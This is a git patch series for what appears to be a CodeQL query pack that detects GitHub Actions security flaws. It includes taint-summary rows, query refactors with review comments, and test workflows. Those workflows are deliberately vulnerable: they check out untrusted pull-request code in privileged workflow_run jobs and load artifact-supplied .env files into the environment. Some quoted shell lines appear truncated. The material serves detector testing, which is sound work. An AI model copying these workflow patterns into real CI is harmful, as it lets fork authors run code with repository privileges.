input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | | drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | | drawpile/drawpile | * | input.path | output.path | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | | element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | 
input.check-name | output.check-name | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | | flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | | getsentry/action-release | * | input.version | output.version | taint | manual | | getsentry/action-release | * | input.version_prefix | output.version | taint | manual | @@ -1124,6 +1137,7 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | | hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | 
@@ -1137,31 +1151,47 @@ summaries | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | | jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | | kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | | linkerd/linkerd2 | * | input.component | output.image | taint | manual | | linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | | linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint 
| manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | | mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | | novuhq/novu | * | input.docker_name | output.image | taint | manual | | philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | | streetsidesoftware/cspell | * | 
input.value | output.value | taint | manual | | streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | @@ -1169,6 +1199,7 @@ summaries | tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml new file mode 100644 index 00000000000..c33c90dbb9c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -0,0 +1,25 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Load .env file + uses: aarcangeli/load-dotenv@v1.0.0 + with: + path: 'backend/new' + filenames: | + .env + .env.test + quiet: false + if-file-not-found: error + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9c2fd6faf46..02aed1c05cb 100644 
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -45,6 +46,8 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -62,3 +65,4 @@ subpaths | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 7ea9865c70a..b3da13beda3 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -45,5 +46,7 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 2e0f79da4a0..5623964e549 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -6,6 +6,9 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | provenance | | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | 
.github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:46:03 +0200 Subject: [PATCH 0411/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5e89afc471..4b237b4bfd3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.18 +version: 0.1.19 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index db9bdecf8b8..4d522db3f98 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.18 +version: 0.1.19 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7f77e89bbfa492e800e973152c0fbe2b4ece9240 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:31:12 +0200 Subject: [PATCH 0412/1267] feat(tests): Add test for checkout in composite action --- .../actions/dangerous-git-checkout/action.yml | 13 +++++++++++++ .../.github/workflows/untrusted_checkout3.yml | 13 +++++++++++++ .../CWE-829/UntrustedCheckoutCritical.expected | 8 ++++++++ 3 files changed, 34 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml new file mode 100644 index 00000000000..57058e7a076 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -0,0 +1,13 @@ +name: Dangerous git Checkout +description: "Git Checkout from PR code so we can run checks from forks" +runs: + using: "composite" + steps: + - name: Checkout repo + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 2 + - run: echo "foo" + shell: bash + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml new file mode 100644 index 00000000000..e0d32875ee7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -0,0 +1,13 @@ +name: Test +on: + workflow_call: + workflow_run: + workflows: [Trigger] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: ./.github/actions/dangerous-git-checkout + - run: yarn test 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4431d865417..ce6d75bf113 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,4 +1,7 @@ edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | 
@@ -332,6 +335,11 @@ edges | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | From 69d173f13c2463c60e04e1aa535dacfd658daaf4 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:47:52 +0200 Subject: [PATCH 0413/1267] fix(refactor): Remove unnecessary variables --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 - ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 4 +--- 6 files changed, 3 insertions(+), 12 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index cd7cefe2dd3..3fc94d1aa22 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -16,7 +16,6 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where - job = checkout.getEnclosingJob() and job.isPrivileged() and job.getATriggerEvent() = event and event.getName() = "pull_request_target" and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index bbbab7bcab7..2656b22e1e3 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -20,7 +20,6 @@ query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9b3154debf..0a83cc54ad6 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
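Review bot: In ImproperAccessControl.ql the deleted `job = checkout.getEnclosingJob()` is the only visible conjunct that relates `job` to `checkout`; the lines left in this hunk constrain `job` and `event` only. The `where` clause continues outside the hunk, so the link may still be made further down. If it is not, the query pairs every privileged `pull_request_target` job with every mutable-ref checkout and reports combinations that never occur in one workflow. The two TOCTOU queries in this commit keep `j.getAStep() = checkout`; adding `job.getAStep() = checkout and` here would make the relation explicit.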
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -18,7 +18,6 @@ import codeql.actions.security.ControlChecks from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index a0da81bde22..02054ebbf0a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,10 +20,8 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } -from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep s where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index dba0dadb61b..0675603af0f 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context 
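Review bot: Removing `LocalJob j` together with `j.getAStep() = checkout` in UntrustedCheckoutCritical.ql looks like more than a variable cleanup, because those two conjuncts also restricted `checkout` to steps that sit directly in a local job. A checkout inside a composite action's `runs` was presumably excluded before and can now match; the same applies to UntrustedCheckoutHigh.ql and UntrustedCheckoutMedium.ql. The privileged-context conjunct lies outside the hunk, so it is worth confirming that it yields a result for a step with no enclosing job. A comment above the `from` line such as `// checkout may sit in a job or in a composite action's runs` would record the intent.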
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index ca91fcb9048..8cc8e75c2af 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout occurs in a non-privileged context inNonPrivilegedContext(checkout) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." From 9917c46f6ffb2cd0f5e2b6fab9528090fdbdbe09 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:48:52 +0200 Subject: [PATCH 0414/1267] feat(core): Add StepsContainer class A StepsContainer is an abstract class that includes all nodes with steps: Runs and LocalJobs --- ql/lib/codeql/actions/Ast.qll | 34 +++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 133 ++++++++++++++------- 2 files changed, 109 insertions(+), 58 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 0662f100fe4..5c6cdc141ee 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
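Review bot: The alert text in UntrustedCheckoutMedium.ql says "on privileged workflow" while the only condition left in the `where` clause is `inNonPrivilegedContext(checkout)`, so the message contradicts what the query selects. Someone triaging the alert would read it as the higher-severity case. Suggested wording: `select checkout, "Potential unsafe checkout of untrusted pull request on non-privileged workflow."`. Any `.expected` file that records this message would need regenerating.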
